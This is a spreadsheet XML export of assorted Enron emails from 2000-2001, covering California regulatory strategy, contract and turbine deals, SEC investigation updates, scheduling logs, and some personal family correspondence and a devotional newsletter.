    <t xml:space="preserve">I like the idea.  Particularly in view of the "California Crisis."  Makes our _x000D_
positions that much more compelling and offers at least part of the _x000D_
"solution" for California._x000D_
_x000D_
_x000D_
_x000D_
	Robert Frank_x000D_
	10/03/2000 01:01 PM_x000D_
		 _x000D_
		 To: Jeff Dasovich/NA/Enron@Enron, Susan J Mara/SFO/EES@EES_x000D_
		 cc: Harry Kingerski/NA/Enron@Enron_x000D_
		 Subject: DG case_x000D_
_x000D_
Jeff/Sue, what are your thoughts about trying to meet with commissioners or _x000D_
key staff to advance our quite reasonable positions in the DG case?  The _x000D_
Phase 1 ruling is only a month away.  It still baffles me that such contacts _x000D_
are permissible, but obviously the utilities are doing whatever they can to _x000D_
oppose our positions on UDC ownership, open access D tariffs, and standby _x000D_
rates._x000D_
</t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 03:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'w.duran@enron.com'})</t>
  </si>
  <si>
    <t>Dave,_x000D_
_x000D_
I would like to recommend to you Sandeep Kohli who is likely to approach you _x000D_
regarding a_x000D_
position in your area._x000D_
_x000D_
I have  been working with Sandeep for a number of years and I was always _x000D_
impressed with his_x000D_
skills, intelligence and mature, thoughtful approach to solving business _x000D_
problems._x000D_
_x000D_
He is currently located in India (our DPC unit) and is looking for a _x000D_
permanent position with Enron in Houston_x000D_
for family reasons (his wife is from Houston and has a family here). Of _x000D_
course, there are_x000D_
some  other obvious factors affecting his decision._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 08:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tricia.truong@enron.com'})</t>
  </si>
  <si>
    <t>Re: EnerVest S# 27239</t>
  </si>
  <si>
    <t xml:space="preserve">Done.  I did the 1999 changes as well._x000D_
_x000D_
DG    3-9573_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Tricia Truong                           11/21/2000 01:50 PM_x000D_
	_x000D_
_x000D_
To: Darron C Giron/HOU/ECT@ECT_x000D_
cc: Lisa Valderrama/HOU/ECT@ECT _x000D_
Subject: EnerVest S# 27239_x000D_
_x000D_
Darron,_x000D_
Could you please change rate on the above Sitara to $4.878216 for Oct. 00 _x000D_
production?_x000D_
_x000D_
Thanks for your help,_x000D_
T  3-9852_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 08:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Here's more for you to enjoy.  We need to make this into an XYZ form to match _x000D_
up with the letter agreement._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 03/07/2001 04:35 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Stephen Thome@ECT_x000D_
03/07/2001 10:26 AM_x000D_
To: rvicens@deltapower.com, aharrington@deltapower.com_x000D_
cc: Jake Thomas/HOU/ECT@ECT, Kay Mann/Corp/Enron@Enron, Carlos _x000D_
Sole/NA/Enron@Enron _x000D_
_x000D_
Subject: LM6000 Documents_x000D_
_x000D_
Tony, Rick_x000D_
_x000D_
Our counsel has provided these drafts of the project documents.  Please _x000D_
review.  We also anticipate sending out the turbine contracts later today._x000D_
_x000D_
Please be advised of our timeline.  Since we need to fund escrow by Wednesday _x000D_
21 March, it is imperative that we are able to sign these documents on Friday _x000D_
16 March.  It is our assumption there will be some lag between the obligation _x000D_
to fund escrow and the actual transfer of funds.  _x000D_
_x000D_
Your comments to these documents are expected by Friday 9 March._x000D_
_x000D_
I also want to mention that Enron initiated the additional purchase of Power _x000D_
System Stabilizers, which cost $31,675 per turbine.  PSS are required in the _x000D_
WSCC, but you will have to  determine whether or not your particular project _x000D_
would be required to install these in New England.  If you desire this _x000D_
optional equipment, please reflect that cost in your final bid.  _x000D_
_x000D_
Steve_x000D_
---------------------- Forwarded by Stephen Thome/HOU/ECT on 03/07/2001 10:20 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Apr 2000 02:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>SEC Panel on Value in the New Economy - Conference Call</t>
  </si>
  <si>
    <t>Dear Ken,_x000D_
_x000D_
We are in the process of trying to arrange a conference call with you on_x000D_
either Tuesday or Wednesday of next week to discuss the paper which is_x000D_
attached.  ( I'm sending it along now so that you have some time to look at_x000D_
it.)_x000D_
_x000D_
We will be doing this by conference call and once we set a time to talk with_x000D_
you, will give you the number to call.  (To set up a time, your office can_x000D_
contact my assistant, Valerie Petersen either at valerie.petersen@yale.edu_x000D_
or at 203-432-6035.)_x000D_
_x000D_
Look forward to speaking with you next week._x000D_
_x000D_
Best regards,_x000D_
Jeff Garten_x000D_
_x000D_
 &lt;&lt;SEC Panel Outline 10Apr00.doc&gt;&gt;_x000D_
_x000D_
 - SEC Panel Outline 10Apr00.doc</t>
  </si>
  <si>
    <t>Wed, 31 Oct 2001 16:59:35 -0800 (PST)</t>
  </si>
  <si>
    <t>Daily Update</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Here is an update on new developments that have occurred over the past few days._x000D_
_x000D_
New Board Member &amp; Committee Elected_x000D_
_x000D_
Today, the Enron Board of Directors elected William Powers, Jr., the dean of The University of Texas School of Law in Austin, Texas, to the Board.  Bill currently holds the John Jeffers Research Chair in Law and the Hines H. Baker and Thelma Kelley Baker Chair in Law at The University of Texas School of Law, where he teaches tort, products liability, jurisprudence, legal process, civil procedure and contracts.  He received his J.D. from Harvard Law School in 1973._x000D_
_x000D_
Additionally, the Board established a Special Committee that will conduct an in-depth review of the transactions between Enron and entities connected to related parties.  The Special Committee, to be chaired by Bill, comprises independent directors Frank Savage, CEO of Savage Holding LLC as chairman, Paulo Ferraz Pereira, executive vice president of Brazilian-owned investment bank Group Bonanza, and Herbert S. Winokur, Jr., chairman and CEO of Capricorn Holdings, Inc.  The committee is authorized to take any actions it deems appropriate._x000D_
_x000D_
The committee has retained William R. McLucas, a former head of the Division of Enforcement of the Securities and Exchange Commission (SEC), with the law firm of Wilmer, Cutler &amp; Pickering as its counsel.  Wilmer, Cutler &amp; Pickering has retained Deloitte &amp; Touche to provide independent accounting advice._x000D_
_x000D_
SEC Changes Inquiry to Investigation_x000D_
_x000D_
We also reported today that the SEC has opened a formal investigation into related party transactions that have been the subject of media reports and were previously the subject of the SEC's formal inquiry.  This is not unusual and we welcome this investigation and are confident that this matter will finally be put to rest._x000D_
_x000D_
With so much publicity surrounding our company right now, I want to ask you to keep in mind that not all media reports are accurate or even based on factual information.  We are committed to communicating updates to you every day by voice mail, e-mail or both, so that you know the factual status of our company's situation._x000D_
_x000D_
We have created an Enron Updates Intranet site (&lt;http://home.enron.com/updates/&gt;) to keep you apprised of current events.  Please check back frequently for information and new developments._x000D_
_x000D_
I truly thank you for your continued hard work and support of our company._x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 16:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'general.announcement@enron.com'})</t>
  </si>
  <si>
    <t>Enron's 2001 Goals</t>
  </si>
  <si>
    <t>General Announcement</t>
  </si>
  <si>
    <t>Our vision to become The World's Leading Company positions our company for _x000D_
great success this year and beyond.  Our success is dependent on execution.  _x000D_
With that in mind, we are making Enron's 2001 corporate and business unit _x000D_
goals available to employees.  _x000D_
_x000D_
Please take a few minutes to review our 2001 goals on Enron's intranet at _x000D_
http://172.28.92.190/bowne/    We believe they will help you gain a better _x000D_
understanding of our vision for the company and will inspire you to identify _x000D_
innovative ways to help your organization and Enron achieve our objectives.  _x000D_
We have a lot to accomplish this year, and with your hard work and _x000D_
dedication, we can realize another year of stellar performance.</t>
  </si>
  <si>
    <t>Tue, 2 Jan 2001 01:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alhamd.alkhayat@enron.com'})</t>
  </si>
  <si>
    <t>Charts</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Steven J Kean/NA/Enron on 01/02/2001 09:44 AM -----_x000D_
_x000D_
	Alan Comnes@ECT_x000D_
	12/22/2000 03:39 PM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron, Ginger Dernehl/NA/Enron@Enron_x000D_
		 cc: Tim Belden/HOU/ECT@ECT, Robert Badeer/HOU/ECT@ECT_x000D_
		 Subject: Charts_x000D_
_x000D_
Steve, Ginger:_x000D_
_x000D_
The first file has the charts and data you requested._x000D_
_x000D_
I am also forwading some charts on price caps.  You may be interested in the _x000D_
charts on California Stage 1/2/3 emergencies._x000D_
_x000D_
Alan Comnes_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Mar 2001 06:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: sempra physical worksheet</t>
  </si>
  <si>
    <t xml:space="preserve">Any progress on this?_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Reves, Brant  _x000D_
Sent: Monday, March 19, 2001 4:40 PM_x000D_
To: Nemec, Gerald_x000D_
Cc: Blanchard, Georgia_x000D_
Subject: sempra physical worksheet_x000D_
_x000D_
Gerald,_x000D_
_x000D_
Here is the first credit worksheet for terms to the draft Sempra contract.  _x000D_
Once you prepare the draft, e-mail it to me, and I will forward it to BGML.  _x000D_
After that, we can get the contact and address information to formally pursue _x000D_
a negotiation._x000D_
_x000D_
thanks_x000D_
brant_x000D_
</t>
  </si>
  <si>
    <t>Fri, 13 Apr 2001 04:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>UO MBA VISITORS (Sorry for the late notice!)</t>
  </si>
  <si>
    <t>Sorry for the late notice, but the cluster of people in suits are UO MBA _x000D_
students who are visiting our office to learn more about Enron._x000D_
_x000D_
Happy Friday the 13th!</t>
  </si>
  <si>
    <t>Wed, 19 Jan 2000 01:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Same as below with the following exceptions_x000D_
_x000D_
Pipeline CGAS_x000D_
Contract 64031_x000D_
Firmness IT_x000D_
Service Type Park &amp; Loan_x000D_
Rate  PAL_x000D_
Term Type Term_x000D_
Eff Date  1/1/2000 - 1/31/2000  Evergreen_x000D_
_x000D_
Pipeline CGAS_x000D_
Contract 64041_x000D_
Firmness IT_x000D_
Service Type Park &amp; Loan_x000D_
Rate  PAL_x000D_
Term Type Term_x000D_
Eff Date  1/1/2000 - 1/31/2000  Evergreen_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 01/19/2000 08:06 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
01/18/2000 07:08 PM_x000D_
To: Sylvia A Campos/HOU/ECT@ECT, Brenda H Fletcher/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: CGAS Pals agreements_x000D_
_x000D_
Please set up the following CGAS contracts.  Please note; ENA is agent for CES_x000D_
_x000D_
Pipeline CGAS_x000D_
Contract 64031_x000D_
Firmness IT_x000D_
Service Type Storage Service_x000D_
Rate  ISS_x000D_
Term Type Term_x000D_
Eff Date  1/1/2000 - 1/31/2000  Evergreen_x000D_
_x000D_
Pipeline CGAS_x000D_
Contract 64041_x000D_
Firmness IT_x000D_
Service Type Storage Service_x000D_
Rate  ISS_x000D_
Term Type Term_x000D_
Eff Date  1/1/2000 - 1/31/2000  Evergreen_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 00:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'heidi.mason@enron.com'})</t>
  </si>
  <si>
    <t>Reporting Line for Sydney Risk Officer</t>
  </si>
  <si>
    <t xml:space="preserve">Scott_x000D_
_x000D_
With all our reporting changing to London Office and now it appears some _x000D_
restructure of risk and the broadening of Sally's role, what are we going to _x000D_
do for the second report for our new risk manager, Justin Den Hertog - he has _x000D_
taken over from Alan._x000D_
_x000D_
He reports to me locally, but functionally he would traditionally have _x000D_
reported to you on behalf of Sally's area. I assume this has now moved with _x000D_
the rest of us and would therefore be either James New or Mike Jordan in _x000D_
London? Can you please advise me via return email as we are working on our _x000D_
PEP stuff, reviews etc._x000D_
_x000D_
With thanks_x000D_
_x000D_
Heidi </t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 08:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: LNG Opportunity</t>
  </si>
  <si>
    <t xml:space="preserve">I didn't call rick.  did you?  What do you think?_x000D_
m_x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
_x000D_
From:  Rick Buy                                                             _x000D_
10/10/2000 10:02 AM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Mike McConnell/HOU/ECT@ECT, Jeff Shankman_x000D_
cc:  _x000D_
Subject: LNG Opportunity_x000D_
_x000D_
A friend of mine, formerly with Bankers Trust, called to see if we are _x000D_
interested in hearing a story about a floating LNG facility. He is with _x000D_
Merlin Production, a small producer, that thinks there is a large market for _x000D_
accessing stranded gas in offshore fields.  If you have an interest let me _x000D_
know and I'll arrange a meeting. I owe this guy nothing other that a call _x000D_
back so if you have no interest say so. Rick_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Aug 2001 08:32:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>Mid Year Reviews</t>
  </si>
  <si>
    <t>I have prepared the feedback forms for my employees and will be discussing it with them shortly.  I am recommending Sales/Presentations courses for both Tyrell and Paul.  Please let me know if you would agree that these would be worthwhile and, if you wish, you can suggest some that you have had experience with._x000D_
_x000D_
Mark</t>
  </si>
  <si>
    <t>Tue, 2 Oct 2001 14:42:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: HEY</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Germany Jr, Don (WD)" &lt;WDGERMANYJR@dow.com&gt;@ENRON [mailto:IMCEANOTES-+22Germany+20Jr+2C+20Don+20+28WD+29+22+20+3CWDGERMANYJR+40dow+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Tuesday, October 02, 2001 1:05 PM_x000D_
To:	Germany, Chris_x000D_
Subject:	RE: HEY_x000D_
_x000D_
Pasquallie,_x000D_
_x000D_
-5 for spelling,_x000D_
W. Don Germany, Jr_x000D_
PO Box 27_x000D_
Cedar Lane, Texas  77415-0027_x000D_
_x000D_
Actually it is not a new truck.  Had 33,000 miles, Ram 2500 3/4 ton, 4 x 4,_x000D_
360 Magnum Motor.  Infinity stereo, bucket seats, nerf bars, tool box, bed_x000D_
liner, camper tow package, 5 speed manual.  Oh, it is dueled out through one_x000D_
catalytic converter with Flow Masters to accent the sound.  Makes me want to_x000D_
race!!!  I believe the fuel consumption will be tolerable as well.  Now,_x000D_
Debbie wants it.  I gave $16,900 + tax.  It is very clean and is Sandalwood,_x000D_
Driftwood or something of that nature in color.  Almost silver.  I have to_x000D_
pick up old gray over at Jerry's.  Debbie said, it is going to be hard on me_x000D_
to sale my old dodge truck.  I said Yep, had that truck longer than I have_x000D_
had most of my women.  I really need to engage brain before articulating!  I_x000D_
am doing dirt work and hope to plant ST Augustine Grass by Friday before_x000D_
rain.  One thing is for sure, the economy is not faltering on my account._x000D_
Dow Stock is back up over $33.  Hooray, hoorah!_x000D_
Needs to go to $41 and then I will be happy.  I spoke with Gerald and he_x000D_
said there are a bunch of folks hanging around Dad's place.  We need to_x000D_
change the lock and place posted signs at the gate.  I may want to put some_x000D_
steers or heifers up there.  I am going up soon and having the tractor_x000D_
fixed.  Reggie said he will pay us soon.  He also still wants the tractor if_x000D_
we can hold on to it.  First come, first serve._x000D_
_x000D_
When is the wedding?  We're set for 11/01/01.  Be sure to take your sweety_x000D_
out on the balcony tonight and gaze at the full moon.  It was sure beautiful_x000D_
coming up last night.  We used to go out and lay in the pasture on a blanket_x000D_
and watch for the space shuttle.  I had a couple of hickies on my neck the_x000D_
day after and the guys all wanted to know if those were shuttle burns.  Just_x000D_
jealous._x000D_
_x000D_
My kid is making wonderful grades and has reassured me she will graduate_x000D_
within the four year period.  She still has some sort of scholarship but I_x000D_
am not for sure how much it pays.  She is going to be a kinesiologist,_x000D_
sports injury therapist.  I think she just wants to be able to touch_x000D_
football players legs.  She will be 20 on 11/03.  I am really proud of her._x000D_
Cindy said Jaime has grown up very much._x000D_
You should e mail her sometimes.  I am sure she would like to hear from you._x000D_
Jgerma5@aol.com._x000D_
_x000D_
At any rate, be careful and be safe.  You should have listened to Maw, as_x000D_
long as you keep your mouth shut and your pants zipped, you will be alright._x000D_
Shucks, guess none of us three paid much attention to that.  Oh, Jeff_x000D_
Sherrar has a new book out. Rise to Rebellion._x000D_
There were some pretty cool dudes back around 1774/76.  There will be two_x000D_
volumes to this saga.  I am half way through the first and you can borrow it_x000D_
when I am through.  I sure like his style of writing.  His books are always_x000D_
hard to put down._x000D_
_x000D_
After the split Dow Stock there are 120 shares._x000D_
_x000D_
Keep Your Powder Dry!_x000D_
_x000D_
Yo,_x000D_
_x000D_
Bro_x000D_
_x000D_
Dow_x000D_
W. Don Germany, Jr._x000D_
2301 N Brazosport Blvd_x000D_
B 3611, Investment Recovery_x000D_
Freeport, Texas 77541_x000D_
_x000D_
Pager 1 800 451 0491 (0448)_x000D_
Office 979 238 2102_x000D_
Home 979 548 7034_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Germany, Chris [mailto:Chris.Germany@ENRON.com]_x000D_
Sent: Tuesday, October 02, 2001 12:28 PM_x000D_
To: Don Germany (E-mail)_x000D_
Subject: HEY_x000D_
_x000D_
_x000D_
What's happening?  I understand you have a brand new truck.  Must be_x000D_
nice having money!!_x000D_
_x000D_
I need 2 things from you._x000D_
_x000D_
	1.	I found the title to the 4 wheeler and I was going to_x000D_
change it over to you name.  What do you think?  If that's ok, how do_x000D_
you want your name to show up on 		the title and what_x000D_
address should I use?_x000D_
_x000D_
	2.	I'm getting ready to divy up the Dow stock.  How many of_x000D_
Dad's shares do you have?_x000D_
_x000D_
Last thing, send me a million dollars, I'm tired of working.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Wed, 13 Sep 2000 15:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marcie.milner@enron.com', 'douglas.condon@enron.com', 'cynthia.sandherr@enron.com', 'tim.belden@enron.com', 'karen.denne@enron.com', 'skean@enron.com', 'robert.badeer@enron.com', 'sarah.novosel@enron.com', 'samuel.wehn@enron.com', 'mpalmer@enron.com', 'mary.hain@enron.com', 'mona.petrochko@enron.com', 'dennis.benevides@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'richard.shapiro@enron.com', 'harry.kingerski@enron.com', 'roger.yang@enron.com', 'david.parquet@enron.com', 'george.waidelich@enron.com', 'james.steffes@enron.com', 'martin.wenzel@enron.com', 'sandra.mccubbin@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>Summary of Congressional/FERC Hearings in San Diego</t>
  </si>
  <si>
    <t xml:space="preserve">Forgive the length, but it was a long couple of days.  Apologies in advance, _x000D_
since I'm sure I've missed something.  Hopefully, it hits the highlights and _x000D_
gives a good flavor.  Please foreward to anyone I've inadvertently missed.  _x000D_
Don't hesitate to contact me if you have any questions._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 14:38:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 10/18/01; HourAhead hour: 17;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 10/18/01; HourAhead hour: 17;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2001101817.txt_x000D_
_x000D_
Error retrieving HourAhead price data - process continuing...</t>
  </si>
  <si>
    <t>Mon, 18 Jun 2001 03:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'linda.robertson@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'mark.palmer@enron.com', 'paul.kaufman@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>CA Memo to Board</t>
  </si>
  <si>
    <t xml:space="preserve">Steve Kean asked that I forward this to you.  This is a memo that was sent to _x000D_
the Board last week._x000D_
_x000D_
_x000D_
----- Forwarded by Maureen McVicker/NA/Enron on 06/18/2001 10:02 AM -----_x000D_
_x000D_
	Karen Denne_x000D_
	06/18/2001 09:03 AM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron_x000D_
		 cc: Maureen McVicker/NA/Enron@Enron_x000D_
		 Subject: CA Memo to Board_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Nov 2001 13:05:58 -0800 (PST)</t>
  </si>
  <si>
    <t>Schedule to the ISDA Master Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Pursuant to Frank Sayre's request, I am attaching a clean and blacklined draft of the Schedule to the ISDA Master Agreement noting certain revisions.  Please contact Frank with any questions or comments._x000D_
_x000D_
Thank you!_x000D_
_x000D_
Marie Heard_x000D_
Senior Legal Specialist_x000D_
Enron North America Corp._x000D_
Phone:  (713) 853-3907_x000D_
Fax:  (713) 646-3490_x000D_
marie.heard@enron.com_x000D_
_x000D_
_x000D_
				 	 </t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 07:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'crb0@pge.com'})</t>
  </si>
  <si>
    <t>PG&amp;E/Enron Agreement Amendment</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Charlotte,_x000D_
 Please explain what you are referring to when you state that Article 12.7 _x000D_
was omitted by accident.  My copy of the signed agreement has 12.7.  I am _x000D_
attaching the proposed Amendment for your review and comments.   I added the _x000D_
Gas Daily Midpoint Price to  be used as a default index when a index was not _x000D_
specified and for online transactions.  Please review and let me have your _x000D_
comments,  if okay, please start the execution process and forward 2 to me _x000D_
for signature by ENA.  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 18 Jun 2001 02:08:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'neilanderson@lists.crosswalk.com'})</t>
  </si>
  <si>
    <t>Neil Anderson Devotional for Monday, June 18, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">  N E I L   A N D E R S O N   D A I L Y   D E V O T I O N A L_x000D_
             from Freedom in Christ Ministries_x000D_
_x000D_
June 18_x000D_
_x000D_
The Fleshly Person_x000D_
_x000D_
I gave you milk to drink, not solid food; for you were not yet_x000D_
able to receive it. Indeed, even now you are not yet able, for_x000D_
you are still fleshly. (1 Corinthians 3: 2,3)._x000D_
_x000D_
The spirit of the fleshly person is identical to that of the_x000D_
spiritual person. The fleshly person is a Christian, spiritually_x000D_
alive in Christ and declared righteous by God. But that's where_x000D_
the similarity ends. Instead of being directed by the Spirit,_x000D_
this believer chooses to follow the impulses of his flesh. As a_x000D_
result, his mind is occupied by carnal thoughts and his emotions_x000D_
are plagued by negative feelings. And though he is free to choose_x000D_
to walk after the Spirit and produce the fruit of the Spirit, he_x000D_
continues to involve himself in sinful activity by willfully_x000D_
walking after the flesh._x000D_
_x000D_
His physical body is a temple of God, but he is using it as an_x000D_
instrument of unrighteousness. He has the same troubling physical_x000D_
symptoms experienced by the natural person because he is not_x000D_
operating in the manner God created him to operate. He is not_x000D_
presenting his body to God as a living sacrifice. Since he yields_x000D_
to the flesh instead of crucifying it, the fleshly man is also_x000D_
subject to feelings of inferiority, insecurity, inadequacy,_x000D_
guilt, worry, and doubt._x000D_
_x000D_
Several years ago I did some research to discover how many_x000D_
Christians are still the victims of their flesh. I asked the same_x000D_
question to 50 consecutive Christians who came to me to talk_x000D_
about problems in their lives: "How many of the following_x000D_
characteristics describe your life: inferiority, insecurity,_x000D_
inadequacy, guilt, worry, and doubt:" Every one of the 50_x000D_
answered, "All six." Here were 50 born-again, righteous children_x000D_
of God who were so bogged down by the flesh that they struggled_x000D_
with the same problems of self-doubt which inundate unbelivers_x000D_
who only live in the flesh._x000D_
_x000D_
If I asked you the same question, how would you answer? I imagine_x000D_
that many of you would admit that some or all of these six traits_x000D_
describe you. It is evident to me that a staggering number of_x000D_
believers are still confused about their spiritual identity in_x000D_
Christ and its implications for their daily lives. We are_x000D_
struggling with the behavior aspect of our growth because we are_x000D_
still struggling with the belief aspect of our growth: who we are_x000D_
in Christ._x000D_
_x000D_
Father, help me live above my fleshly desires today by exercising_x000D_
my spiritual inheritance at every temptation._x000D_
_x000D_
_x000D_
-----------_x000D_
This daily devotional is published and distributed by_x000D_
Crosswalk.com.  It is written by Neil Anderson at_x000D_
&lt; http://www.ficm.org &gt;._x000D_
_x000D_
You can purchase "Daily in Christ" and other titles by Neil Anderson at_x000D_
christianbook.com (Christian Book Distributors - CBD)._x000D_
&lt; http://shopping.crosswalk.com/bye/devo_na &gt;_x000D_
_x000D_
Additional devotionals are available from Crosswalk.com:_x000D_
&lt; http://devotionals.crosswalk.com &gt;._x000D_
-----------_x000D_
To read the Current Feature Story from ReligionToday,_x000D_
go to http://religiontoday.crosswalk.com/CurrentFeatureStory/_x000D_
_x000D_
For today's complete News Summary from ReligionToday,_x000D_
go to http://religiontoday.crosswalk.com/CurrentNewsSummary/_x000D_
_x000D_
_x000D_
_x000D_
-----------_x000D_
For Copyright Terms go to http://www.crosswalk.com/info/copyright_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
____________________SUBSCRIPTION INFO________________________x000D_
_x000D_
* You subscribed to Neil Anderson as:_x000D_
         &lt; jeff.king@enron.com &gt;_x000D_
* To unsubscribe from this newsletter immediately, click here:_x000D_
         &lt; http://link.crosswalk.com/UM/U.ASP?A3.14.261895 &gt;_x000D_
  If that link is not clickable, simply copy and paste it into_x000D_
  your browser window._x000D_
* To change your address:  unsubscribe your old address_x000D_
  and then subscribe your new address._x000D_
* To subscribe, send an email to:_x000D_
  &lt; SUBSCRIBE-neilanderson@lists.crosswalk.com &gt; or go to_x000D_
  &lt; http://www.crosswalk.com/lists &gt; for a complete list of_x000D_
  our newsletters._x000D_
* Copyright ? 2001 Crosswalk.com, Inc. and its Content_x000D_
  Providers. All rights reserved._x000D_
_x000D_
_____________________________________________________________x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 03:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dbaughm@yahoo.com'})</t>
  </si>
  <si>
    <t>Fwd: Foundations</t>
  </si>
  <si>
    <t>Note: forwarded message attached._x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Yahoo! Auctions - Buy the things you want at great prices._x000D_
http://auctions.yahoo.com/_x000D_
X-Apparently-To: dbaughm@yahoo.com via web10607_x000D_
Received: from imo-d05.mx.aol.com (205.188.157.37)  by mta301.mail.yahoo.com _x000D_
with SMTP; 01 Mar 2001 20:16:19 -0800 (PST)_x000D_
Received: from ChanceTex@aol.com by imo-d05.mx.aol.com (mail_out_v29.5.) id _x000D_
r.ea.1213fc30 (4205)  for &lt;dbaughm@yahoo.com&gt;; Thu, 1 Mar 2001 23:16:00 -0500 _x000D_
(EST)_x000D_
From: ChanceTex@aol.com_x000D_
Message-ID: &lt;ea.1213fc30.27d0787f@aol.com&gt;_x000D_
Date: Thu, 1 Mar 2001 23:15:59 EST_x000D_
Subject: Foundations_x000D_
To: dbaughm@yahoo.com_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary="part1_ea.1213fc30.27d0787f_boundary"_x000D_
X-Mailer: AOL 4.0 for Windows 95 sub 113_x000D_
Content-Length: 45343_x000D_
_x000D_
_x000D_
_x000D_
 - FOUNDA~1.DOC</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 18:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Part Time Employee?</t>
  </si>
  <si>
    <t>You not working today? I called like 3 times. Did you hear about Jaimie Hawley's litttle brother? She must be a mess. I haven't got anything for Mom's b-day yet. Any great ideas? Did she get her flowers for Mother's day? Father's day is coming up June 17. Maybe we should give Dad that Arnold Palmer flag for father's day. Later..._x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 13:58:55 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'r..guinn@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'james.derrick@enron.com', 'gary.hickerson@enron.com', 'teresa.callahan@enron.com', 'jeff.donahue@enron.com', 'h..boots@enron.com', 'barry.schnapper@enron.com', 'rick.buy@enron.com', 'richard.lydecker@enron.com', 'mark.frevert@enron.com', 'kate.cole@enron.com', 'e..haedicke@enron.com', 'denise.ernest@enron.com', 'louise.kitchen@enron.com', 'ted.murphy@enron.com', 'raymond.bowen@enron.com', 'ben.glisan@enron.com', 'legal &lt;.schuler@enron.com&gt;', 'h..douglas@enron.com', 'john.thompson@enron.com', 'robert.hermann@enron.com', 's..bradford@enron.com', 'jesse.neyman@enron.com', 'john.lavorato@enron.com', 'julia.murray@enron.com', 'andrew.fastow@enron.com', 'joseph.deffner@enron.com', 'elaine.overturf@enron.com', 'scott.josey@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
The lawfirm representing the plaintiff in this class action lawsuit is sending document requests to all officers and directors of several Enron related companies.  You may be an officer or director of one of these companies.  If you receive any document request or other legal papers, please send the document to me at EB 3827.  Please call me at x35587 if you have any questions._x000D_
_x000D_
</t>
  </si>
  <si>
